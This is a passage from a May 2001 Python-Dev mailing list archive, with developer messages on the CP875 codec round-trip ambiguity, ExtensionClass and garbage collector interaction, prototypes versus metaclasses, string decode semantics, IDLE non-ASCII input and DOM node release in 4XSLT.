think", but not all the way. From fredrik at pythonware.com Sat May 12 14:25:43 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Sat, 12 May 2001 14:25:43 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? References: Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid> tim wrote: > If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings > winning the game, then iterating over decoding_map.items() in reverse sorted > order would do the trick reliably. reverse sorting makes sense to me. but the cp-files appear to be machine generated, so patching that python file won't help. > But I don't know whether the ambiguity in cp875 is a bug or an undocumented > feature ... a truly future-proof solution would be to specify exactly how to resolve every many-to-one mapping, for every font having that problem. but sorting them is clearly better than relying on implementation-dependent behaviour... (is Jython using exactly the same hashing and dictionary algorithms as CPython? or does it work by accident also under Jython?) Cheers /F From nas at python.ca Sat May 12 16:28:54 2001 From: nas at python.ca (Neil Schemenauer) Date: Sat, 12 May 2001 07:28:54 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500 References: <15100.20090.573866.569667@beluga.mojam.com> Message-ID: <20010512072854.A4271@glacier.fnational.com> skip at pobox.com wrote: > > Has anyone investigated interactions between ExtensionClass objects and GC? > I've encountered segfaults with 2.1 in certain situations when using the > latest PyGtk stuff. Do any of the PyGtk objects define the GC type flag? The GC is fairly good a exposing memory management bugs that otherwise go unnoticed. If you're using glib you can try setting the MALLOC_CHECK_ environment variable to 2. If you've got lots of memory you could also try using electric fence and running your program. Finally, you might try compiling with Py_DEBUG set. > Neil and/or Jim (and/or anyone else willing to look into this problem), I > can give you access to my development machine via ssh if you think that > would help debug the problem. I'd be willing to take a look (the chances of me reproducing it don't look good). A public RSA key is attached. Neil 1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available URL: From sdm7g at Virginia.EDU Sat May 12 17:07:06 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 11:07:06 -0400 (EDT) Subject: [Python-Dev] prototypes (was: Type/class) In-Reply-To: Message-ID: [Guido] > Do prototype-based language have the equivalence of multiple > inheritance? Yeah ... What Tim said... Also: There are two basic implementation models: Delegation [a.k.a. "Lifetime sharing", cloning] sort of like python -- if you don't know how to handle it "ask" a parent object. ( "ask" in quotes, because I've recently been in a long argument about whether objective-C & smalltalk can really be said to "send messages" , or if it's "just" dynamic lookup and function application! ) Extension [a.k.a. "Birth sharing", copying, concatenation ] more like how I imaging C++ vtables are built -- the python equivalent would be like merging all of the class __dict__'s together with name-clase priority going to the nearest relative. ( "Life Sharing" vs. "Birth Sharing" -- is a change in the base class after object creation inherited by the object? ) I think most Multiple-Inheritance languages use delegation, but no reason it won't work in extension. The diff is that in extension, everything has to get resolved at object creation. Extension could be made more flexible if on creation, you could not only add new methods, but rearrange and control the extension process ( sort of like "from xxx import yyy; from aaa import bbb" ). I would think one could use delegation by default, but provide an extension mechanism as an optimization, but I don't know if there's any system that does this. If it follows the paradigm, a prototype system doesn't have an 'isa' or '__class__' slot -- only a (linked) list of parent objects. But if you were simulating class orientation, one would add an 'isa' slot for the immediate prototype, and probably enforce some restrictions on the prototype objects that were playing the role of class objects. "If it follow the paradigm" -- as in OO in general, there are several flavors and implementations and some are may be hybrid systems. Self is the language most widely known as a prototype based language: some others: Newtonscript (from apple's late lamented Newton palmtop), Kevo (a forth based o-o language), Cardelli's Obliqu (This didn't stick in my mind from when I read the papers back in the "safe python" development days, but it's listed in my book.) as well as XlispStat's object system. (which isn't listed in that book but there is an ObjectLisp -- I don't know if they were at all related. ) -- and Tim said JavaScript. The Amulet and Garnet GUI systems are prototype based -- Garnet written in Lisp and Amulet in C++. For NewtonScript, Kevo, and maybe JavaScript, I suspect the simplicity of the system was a motivation. ("the book" I'm reading is "Prototype-Based Programming -- Concepts, Languages and Applications" ed. James Noble, Antero Taivalsaari, Ivan Moore, pub. Springer. A collection of papers, some of which are available on the Web -- I know the Self papers, one description of NewtonScript, and one or two articles on Kevo are online, as well as Cardelli's Obliq paper. ) -- "Steve" Majewski From martin at loewis.home.cs.tu-berlin.de Sat May 12 21:16:58 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 21:16:58 +0200 Subject: [Python-Dev] GC and ExtensionClass Message-ID: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> > Has anyone investigated interactions between ExtensionClass objects > and GC? At some point, extension classes used a literal copy of PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, and only had the spare fields that were expected then. Today, PyTypeObject has much more fields, so extension objects produce random errors (eg. with GC) when used in a modern interpreter (where the copy has not been synchronized). Whatever immediately follows the type object in memory may be interpreted as GC flag. Regards, Martin From guido at digicool.com Sat May 12 23:08:05 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:08:05 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sat, 12 May 2001 21:16:58 +0200." <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> Message-ID: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> > At some point, extension classes used a literal copy of > PyTypeObject. Unfortunately, that copy was made with Python 1.4 or so, > and only had the spare fields that were expected then. Today, > PyTypeObject has much more fields, so extension objects produce random > errors (eg. with GC) when used in a modern interpreter (where the copy > has not been synchronized). Whatever immediately follows the type > object in memory may be interpreted as GC flag. Not quite true. ExtensionClasses (at least recent versions that worked with 1.5.2) contain a copy of the type object up to and including the tp_flags field, and the 2.1 code is careful not to use any newer fields without first checking the corresponding flag bit. Now, if you are using the 1.4 version of ExtensionClasses you might not have the tp_flags field either (I don't know, I can't easily check) but the 1.5.2-compatible version of ExtensionClasses doesn't even require recompilation to work with Python 2.1. --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Sat May 12 22:12:39 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sat, 12 May 2001 22:12:39 +0200 Subject: [Python-Dev] Ill-defined encoding for CP875? Message-ID: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> > But I don't know whether the ambiguity in cp875 is a bug or an > undocumented feature The official (as in "as official as it gets") mapping between CP 875 and Unicode is at http://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT This is also the file which served as an input to generate cp875.py. Character 1A, which is the mapping result of these characters, is indeed known with the name "SUBSTITUTE", apparently following the definition in http://www.its.bldrdoc.gov/fs-1037/dir-035/_5170.htm # substitute character (SUB): A control character that is used in the # place of a character that is recognized to be invalid or in error or # that cannot be represented on a given device. That would suggest that these characters in EBCDIC 875 do not have equivalents in Unicode. However, http://www.kostis.net/charsets/ebc875.htm suggests that the characters in question (3F, DC, E1, EC, ED, FC, and FD) have no character meaning at all. It seems that IBM's ICU library also maps U+001A to character 3F, see http://oss.software.ibm.com/developerworks/opensource/cvs/icu/data/ibm-875_P100-2000.ucm?rev=1.1&content-type=text/x-cvsweb-markup It appears, from looking at http://www.natural-innovations.com/boo/asciiebcdic.html that byte 3F *is* the substitution character in EBCDIC. So it is a bug in the CP875 codec to map Unicode SUBSTITUTE to an arbitrary EBCDIC character which is mapped to SUBSTITUTE; I think cp875 should be corrected to always map U+001A to 3F. That is not something the generator can currently do, though. So I think we can take one of two approaches: 1. admit that CP 875 is not round-trippable, and exclude it from the test (although when looking at the first 128 characters only, it is round-trippable). 2. remove the SUBSTITUTE mappings from CP875, acknowledging that apparently these characters have no meaning in that code page. Unfortunately, I could not find any official IBM documentation page that lists the characters supported in each of the EBCDIC code pages. The second seems to be more corrrect to me, although it is a deviation from the Unicode consortium publications. Regards, Martin From guido at digicool.com Sat May 12 23:21:21 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 12 May 2001 16:21:21 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 11:07:06 -0400." References: Message-ID: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> > Also: There are two basic implementation models: > > Delegation [a.k.a. "Lifetime sharing", cloning] > sort of like python -- if you don't know how to handle it "ask" > a parent object. ( "ask" in quotes, because I've recently been > in a long argument about whether objective-C & smalltalk can > really be said to "send messages" , or if it's "just" dynamic > lookup and function application! ) > > Extension [a.k.a. "Birth sharing", copying, concatenation ] > more like how I imaging C++ vtables are built -- the python > equivalent would be like merging all of the class __dict__'s > together with name-clase priority going to the nearest > relative. > > ( "Life Sharing" vs. "Birth Sharing" -- is a change in the > base class after object creation inherited by the object? ) Interesting. So is the rest of this thread, but since Python is not a prototype language and is unlikely to become one, I'd like to mention that Python 2.2 will likely allow you to choose either paradigm, on a per-class basis, using metaclasses. I'm finding metaclasses in Python useful for different things than they are in Smalltalk, and I expect that they will continue to play a less important role. But they are important because they control many "policy" aspects of Python classes/types: e.g. whether instances have a __dict__ or a specific set of slots (maybe even typed slots), whether changes can be made to a class after it's been created, the semantics of multiple inheritance, and so on. Right now, my metaclasses continue to be implemented in C, although I expect that eventually they will be subclassable in Python. Watch the descr-branch in the CS tree. I hope I'll soon have some time to write a PEP, too. It's an interesting journey! The book I am reading about this: "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. http://cseng.awl.com/book/0,3828,0201433052,00.html --Guido van Rossum (home page: http://www.python.org/~guido/) From sdm7g at Virginia.EDU Sat May 12 22:53:26 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Sat, 12 May 2001 16:53:26 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> Message-ID: On Sat, 12 May 2001, Guido van Rossum wrote: > Interesting. So is the rest of this thread, but since Python is not a > prototype language and is unlikely to become one, I'd like to mention > that Python 2.2 will likely allow you to choose either paradigm, on a > per-class basis, using metaclasses. As I said earlier: the only advantage would be if it could simplify things "under the hood" (compared to metaclasses) but could still provide the same Class semantics (with maybe a "proto" declaration sneaking it's nose in under the tent.) But I have no immediate idea on how to do that, and it sounds like you're pretty far along into an implementation already. > I'm finding metaclasses in Python useful for different things than > they are in Smalltalk, and I expect that they will continue to play a > less important role. But they are important because they control many > "policy" aspects of Python classes/types: e.g. whether instances have > a __dict__ or a specific set of slots (maybe even typed slots), > whether changes can be made to a class after it's been created, the > semantics of multiple inheritance, and so on. I guess my practical quesion, which I meant to ask before I got myself sidetracked into preaching prototypes is: How much of the existing plumbing (specifically the Don Beaudry hack) can I rely on in the future for the objective-C/python bridge ? With BOOST and Zope's extension classes relying on it, can I assume that it's being extended rather than replaced ? ( I guess I ought to take a look at the code! ) > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html Thanks for the reference. Talking about interesting journies: Guido: did you ever imagine back at that first workshop at NIST that you and Python would be where you are today ? -- Steve Majewski From gmcm at hypernet.com Sat May 12 23:09:41 2001 From: gmcm at hypernet.com (Gordon McMillan) Date: Sat, 12 May 2001 17:09:41 -0400 Subject: [Python-Dev] Type/class In-Reply-To: <200105122121.QAA10000@cj20424-a.reston1.va.home.com> References: Your message of "Sat, 12 May 2001 11:07:06 -0400." Message-ID: <3AFD6E55.1096.B4BFBD3F@localhost> [Guido] > It's an interesting journey! The book I am reading about this: > "Putting Metaclasses to Work" by Ira Forman and Scott Danforth. > http://cseng.awl.com/book/0,3828,0201433052,00.html The two things that struck me most when I read that last year: - How eminently ill-suited C++ is for this stuff (the book develops a framework in C++) - a very convincing argument that if you derive C from A and B (whose metaclasses are not the same), the system must derive a metaclass for C, using MI from A and B's metaclasses. duct-tape-skull-cap-advised-ly y'rs - Gordon From tim.one at home.com Sat May 12 23:22:49 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 12 May 2001 17:22:49 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? In-Reply-To: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: [/F] > reverse sorting makes sense to me. but the cp-files appear to be > machine generated, so patching that python file won't help. Agreed. > a truly future-proof solution would be to specify exactly how to > resolve every many-to-one mapping, for every font having that > problem. but sorting them is clearly better than relying on > implementation-dependent behaviour... The attached program suggests the problem is rare; of those encoding files that have a Python decode_map dict, only these triggered a meaningful ambiguity complaint: *** cp1006.py maps 0xfe8e back to 0xb1, 0xb2 *** cp875.py maps 0x1a back to 0x3f, 0xdc, 0xe1, 0xec, 0xed, 0xfc, 0xfd Then since test_unicode only checks for roundtrip across range(0x80), cp875 is the only one that *can* fail (the ambiguities in cp1006 are for points > 0x7f, so aren't tested here). Hmm! Now I see that in a part of test_unicode that wasn't reached, cp875 and cp1006 are excluded, with this comment: ### These fail the round-trip: #'cp1006', 'cp875', 'iso8859_8', So the practical hack for now is to exclude cp875 from the earlier range(128) roundtrip test too. > (is Jython using exactly the same hashing and dictionary algorithms as > CPython? or does it work by accident also under Jython?) Sorry, no idea. Attempting to browse the Jython source on SourceForge caused this cute behavior: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/jython/jython/Lib/ Python Exception Occurred Traceback (innermost last): File "/usr/lib/cgi-bin/viewcvs.cgi", line 2286, in ? main() File "/usr/lib/cgi-bin/viewcvs.cgi", line 2253, in main view_directory(request) File "/usr/lib/cgi-bin/viewcvs.cgi", line 1043, in view_directory fileinfo, alltags = get_logs(full_name, rcs_files, view_tag) File "/usr/lib/cgi-bin/viewcvs.cgi", line 987, in get_logs raise 'error during rlog: '+hex(status) error during rlog: 0x100 let's-rewrite-it-in-php-ly y'rs - tim ENCODING_DIR = "../Lib/encodings" import os import imp def d(w): if type(w) is type(6): return hex(w) else: return repr(w) encfiles = [name for name in os.listdir(ENCODING_DIR) if name.endswith(".py") and name[0] != "_"] for fname in encfiles: path = os.path.join(ENCODING_DIR, fname) f = open(path) module = imp.load_source(fname[:-3], path, f) f.close() decode = getattr(module, "decoding_map", None) if decode is None: print fname, "doesn't have decoding_map." continue vtok = {} for k, v in decode.items(): if v in vtok: vtok[v].append(k) else: vtok[v] = [k] ambiguous = [(v, ks) for v, ks in vtok.items() if len(ks) > 1] if ambiguous: for v, ks in ambiguous: ks.sort() print "***", fname, "maps", d(v), "back to", \ ", ".join(map(d, ks)) else: print fname, "is free of ambiguous reverse maps." From tim.one at home.com Sat May 12 23:48:38 2001 From: tim.one at home.com (Tim Peters) Date: Sat, 12 May 2001 17:48:38 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <200105122012.f4CKCd201688@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, whose encyclopedic knowledge of encoding details still isn't enough to get a clear answer (it's like somebody asking me for a simple answer to a floating point question ] > ... > So I think we can take one of two approaches: > > 1. admit that CP 875 is not round-trippable, and exclude it from the > test (although when looking at the first 128 characters only, it > is round-trippable). As I noted later, 875 is already excluded from the roundtrip test across range(128, 256). What it's failing is the roundtrip test across range(128): after unicode("?", "cp875") produces u'\x1a', the following .encode('c875') has no way to know which range the original input came from. So it's not really round-trippable across range(128) either unless more info is given to .encode(). > 2. remove the SUBSTITUTE mappings from CP875, acknowledging that > apparently these characters have no meaning in that code page. > Unfortunately, I could not find any official IBM documentation > page that lists the characters supported in each of the EBCDIC > code pages. > > The second seems to be more corrrect to me, although it is a deviation > from the Unicode consortium publications. Until you and MAL agree on the best thing to do (I have no opinion: my only exposure to Unicode in daily programming life remains the Python test suite), I'm going to opt for #1: as cp875.py stands today, it's simply a fact that it's not round-trippable across any range including 0x3f. From martin at loewis.home.cs.tu-berlin.de Sun May 13 00:32:10 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 00:32:10 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122108.QAA09951@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sat, 12 May 2001 16:08:05 -0500) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> Message-ID: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> > Now, if you are using the 1.4 version of ExtensionClasses you might > not have the tp_flags field either (I don't know, I can't easily > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > even require recompilation to work with Python 2.1. I'll attach a copy below of the struct as defined in pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension classes). As you can see, it does not provide tp_flags, but has a field of tp_xxx4 for it. That *should* work, except that it also has its 'methods' field where tp_traverse would go, and its class_flags field where tp_clear would go. Now, you write > ExtensionClasses (at least recent versions that worked with 1.5.2) > contain a copy of the type object up to and including the tp_flags > field, and the 2.1 code is careful not to use any newer fields > without first checking the corresponding flag bit. In this generality, it is apparently not true: Modules/gcmodule.c has, in delete_garbage, if ((clear = op->ob_type->tp_clear) != NULL) { ... traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; (void) traverse(PyObject_FROM_GC(gc), (visitproc)visit_decref, NULL); which does not check any flags. That still shouldn't cause any problems, since the Gtk objects should never end up in the GC lists - but may be I'm missing something. Regards, Martin typedef struct { PyObject_VAR_HEAD char *tp_name; /* For printing */ int tp_basicsize, tp_itemsize; /* For allocation */ /* Methods to implement standard operations */ destructor tp_dealloc; printfunc tp_print; getattrfunc tp_getattr; setattrfunc tp_setattr; cmpfunc tp_compare; reprfunc tp_repr; /* Method suites for standard classes */ PyNumberMethods *tp_as_number; PySequenceMethods *tp_as_sequence; PyMappingMethods *tp_as_mapping; /* More standard operations (at end for binary compatibility) */ hashfunc tp_hash; ternaryfunc tp_call; reprfunc tp_str; getattrofunc tp_getattro; setattrofunc tp_setattro; /* Space for future expansion */ long tp_xxx3; long tp_xxx4; char *tp_doc; /* Documentation string */ #ifdef COUNT_ALLOCS /* these must be last */ int tp_alloc; int tp_free; int tp_maxalloc; struct _typeobject *tp_next; #endif PyMethodChain methods; long class_flags; PyObject *class_dictionary; PyObject *bases; PyObject *reserved; } PyExtensionClass; From martin at loewis.home.cs.tu-berlin.de Sun May 13 14:08:02 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 14:08:02 +0200 Subject: [Python-Dev] ReleaseNode interface in 4XSLT Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Currently, 4XSLT has a dependency on the DOM implementation in terms of memory management (among other dependencies). I'd like to reduce this dependency, by providing a centralized function that knows how to release nodes. In PyXML, I currently use # Define ReleaseNode in a DOM-independent way import xml.dom.ext import xml.dom.minidom def _releasenode(n): if isinstance(n, xml.dom.minidom.Node): n.unlink() else: xml.dom.ext.ReleaseNode(n) try: from Ft.Lib import pDomlette def ReleaseNode(n): if isinstance(n, pDomlette.Node): pDomlette.ReleaseNode(n) else: _releasenode(n) _XsltElementBase = pDomlette.Element except ImportError: ReleaseNode = _releasenode from minisupport import _XsltElementBase This code knows how to release minidom, 4DOM, and pDomlette nodes, and supports installations without 4Suite (i.e. without pDomlette). I've put this into xslt/__init__.py, so that all callers of Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. If desired, I could produce a patch against the public Ft CVS. As a slightly independent question, such a function also ought to support DOM implementations not known to it; I'm thinking in particular of the Zope DOMs. I'd like to hear proposals on how such an interface should work; I see three options: a) it is an operation on the document node (or any node), as in minidom. b) it is an operation on the DOM implementation (almost as in 4Suite; you'd need to navigate from the node to the implementation, then you'd need a well-known operation on the implementation) c) the code assumes that no release activity is necessary for unknown DOMs, effectively believing in reference counting, garbage collection, acquisition, and other black art. Any comments appreciated, in particular 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and 2. from authors of other DOMs on a general memory management API for Python DOM. Regards, Martin From mwh at python.net Sun May 13 14:36:26 2001 From: mwh at python.net (Michael Hudson) Date: 13 May 2001 13:36:26 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Fredrik Lundh wrote: > > can you take that again? shouldn't michael's example be > > equivalent to: > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > if not, I'd argue that your "decode" design is broken, instead > > of just buggy... > > Well, it is sort of broken, I agree. The reason is that > PyString_Encode() and PyString_Decode() guarantee the returned > object to be a string object. To be able to reuse Unicode codecs > I added code which converts Unicode back to a string in case the > codec return an Unicode object (which the .decode() method does). > This is what's failing. It strikes me that if someone executes aString.decode("latin-1") they're going to expect a unicode string. AIUI, what's currently happening is that the string is converted from a latin-1 8-bit string to the 16-bit unicode string I expected and then there is an attempt to convert it back to an 8-bit string using the default encoding. So if I'd done a sys.setdefaultencoding("latin-1") in my sitecustomize.py, then aString.decode("latin-1") would just be aString again? This doesn't seem optimal. > Perhaps I should simply remove the restriction and have both APIs > return the codec's return object as-is ?! (I would be in favour of > this, but I'm not sure whether this is already in use by someone...) Are all the codecs ditributed with Python 2.1 unicode-related? If that's the case, PyString_Decode isn't terribly useful is it? It seems unlikely that it received much use. Could be wrong of course. OTOH, maybe I'm trying to wedge to much behaviour onto a a particular operation. Do we want open(file).read().decode("jpeg") -> some kind of PIL object to be possible? Cheers, M. -- GET *BONK* BACK *BONK* IN *BONK* THERE *BONK* -- Naich using the troll hammer in cam.misc From mal at lemburg.com Sun May 13 18:53:55 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 18:53:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: <3AFEBC22.1F0AF685@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Fredrik Lundh wrote: > > > can you take that again? shouldn't michael's example be > > > equivalent to: > > > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > > > if not, I'd argue that your "decode" design is broken, instead > > > of just buggy... > > > > Well, it is sort of broken, I agree. The reason is that > > PyString_Encode() and PyString_Decode() guarantee the returned > > object to be a string object. To be able to reuse Unicode codecs > > I added code which converts Unicode back to a string in case the > > codec return an Unicode object (which the .decode() method does). > > This is what's failing. > > It strikes me that if someone executes > > aString.decode("latin-1") > > they're going to expect a unicode string. AIUI, what's currently > happening is that the string is converted from a latin-1 8-bit string > to the 16-bit unicode string I expected and then there is an attempt > to convert it back to an 8-bit string using the default encoding. So > if I'd done a > > sys.setdefaultencoding("latin-1") > > in my sitecustomize.py, then aString.decode("latin-1") would just be > aString again? This doesn't seem optimal. True and that's why I am proposing to losen the restriction on having the two APIs returning strings only. > > Perhaps I should simply remove the restriction and have both APIs > > return the codec's return object as-is ?! (I would be in favour of > > this, but I'm not sure whether this is already in use by someone...) > > Are all the codecs ditributed with Python 2.1 unicode-related? If > that's the case, PyString_Decode isn't terribly useful is it? It > seems unlikely that it received much use. Could be wrong of course. All standard codecs in 2.0 and 2.1 are Unicode related. I am planning to write up a bunch of string-to-string codecs next week though which will then be the first non-Unicode related codecs in 2.2. > OTOH, maybe I'm trying to wedge to much behaviour onto a a particular > operation. Do we want > > open(file).read().decode("jpeg") -> some kind of PIL object > > to be possible? This would be possible indeed. Even though some may find this coding style obscure, I think this technique has the same usefulness as e.g. piping at OS level. I am thinking of these use cases: "???".decode("latin-1") -> Unicode (object construction) "...jpeg data...".decode("jpeg") -> JpegImage object (dito) "???".decode("latin-1").encode("cp1521") -> string (recoding data) "...long data...".encode("gzip") -> string (transfer encoding) "...gzipped data...".decode("gzip") -> string (transfer decoding) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 13 19:20:01 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:20:01 +0200 Subject: [Python-Dev] Re: Ill-defined encoding for CP875? References: Message-ID: <3AFEC241.62084286@lemburg.com> Tim Peters wrote: > > I have a way to make dict lookup a teensy bit cheaper(*) that significantly > reduces the number of collisions (which is much more valuable). > > This caused a number of std tests to fail, because they were implicitly > relying on the order in which a dict's entries are materialized via .keys() > or .items(). > > Most of these were easy enough to fix. The last failure remaining is > test_unicode, and I don't know how to fix it. It's dying here: > > try: > verify(unicode(s,encoding).encode(encoding) == s) > except TestFailed: > print '*** codec "%s" failed round-trip' % encoding > except ValueError,why: > print '*** codec for "%s" failed: %s' % (encoding, why) > > when encoding == "cp875". There's a bogus problem you have to worm around > first: test_unicode neglected to import TestFailed, so it actually dies > with NameError while trying the "except TestFailed" clause after verify() > raises TestFailed. Once that's repaired, it's complaining about failing the > round-trip encoding. Ooops; this must have been caused by the assert statment removal in the test suite I hacked up some months ago. Funny that it never showed up... the code seems to be very robust ;-) > The original character in s it's griping about is "?" (0x3f). cp875.py has > this entry in its decoding_map dict: > > 0x003f: 0x001a, # SUBSTITUTE > > But 0x1a is not a *unique* value in this dict. There's also > > 0x00dc: 0x001a, # SUBSTITUTE > 0x00e1: 0x001a, # SUBSTITUTE > 0x00ec: 0x001a, # SUBSTITUTE > 0x00ed: 0x001a, # SUBSTITUTE > 0x00fc: 0x001a, # SUBSTITUTE > 0x00fd: 0x001a, # SUBSTITUTE > > Therefore what appears associated with 0x1a in the derived encoding_map > dict: > > encoding_map = {} > for k,v in decoding_map.items(): > encoding_map[v] = k > > may end up being any of the 7 decoding_map keys that map to 0x1a. It just > so happened to map back to 0x3f before, but to 0xfd after the dict change, > so "?" doesn't survive the round trip anymore. The "right" thing to do here, is to simply remove cp875 from the test for round-tripping. It is not the only encoding which fails this test, but it's not our fault: the codecs were all generated from the original codec maps at the Unicode.org site. If their mappings are broken, we can't do much about it... other than to ignore the error or remove the codec altogether. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 13 19:40:58 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:40:58 +0200 Subject: [Python-Dev] IDLE and non-ASCII characters References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <3AFEC72A.33076220@lemburg.com> Martin von Loewis wrote: > > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='??' > UnicodeError: ASCII encoding error: ordinal not in range(128) > > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. > > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. > > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. I have a bug report assigned to myself which indicates similar problems with _tkinter and Tk/Tcl. There were other problem reports on the German Python mailing list going in the same direction too. The basic problem seems to be that Tk/Tcl applies too much magic to the text widget contents in order to find out the used encoding and this can easily cause the whole encoding mechanism to fail. A Tk/Tcl expert should really look into this and fix _tkinter.c to aid Tk/Tcl in not mixing up the encodings (e.g. it would probably be a good idea to recode Python 8bit-strings into whatever encoding Tk/Tcl assumes as default). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From Mike.Olson at fourthought.com Sun May 13 20:15:46 2001 From: Mike.Olson at fourthought.com (Mike Olson) Date: Sun, 13 May 2001 12:15:46 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Message-ID: <3AFECF52.FF7E9B26@FourThought.com> "Martin v. Loewis" wrote: > > > In PyXML, I currently use > > # Define ReleaseNode in a DOM-independent way > import xml.dom.ext > import xml.dom.minidom > def _releasenode(n): > if isinstance(n, xml.dom.minidom.Node): > n.unlink() > else: > xml.dom.ext.ReleaseNode(n) > > try: > from Ft.Lib import pDomlette > def ReleaseNode(n): > if isinstance(n, pDomlette.Node): > pDomlette.ReleaseNode(n) > else: > _releasenode(n) > _XsltElementBase = pDomlette.Element > except ImportError: > ReleaseNode = _releasenode > from minisupport import _XsltElementBase > > This code knows how to release minidom, 4DOM, and pDomlette nodes, and > supports installations without 4Suite (i.e. without pDomlette). I've > put this into xslt/__init__.py, so that all callers of > Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. > If desired, I could produce a patch against the public Ft CVS. What if we put these on the implementation, that or came up with a standard interface on the node. Then, every DOM imp that wants to be compatible with xpath/xslt needs to support this interface? node.ownerDocument.implementation.releaseNode(node) or node.py_unlink() > > As a slightly independent question, such a function also ought to > support DOM implementations not known to it; I'm thinking in > particular of the Zope 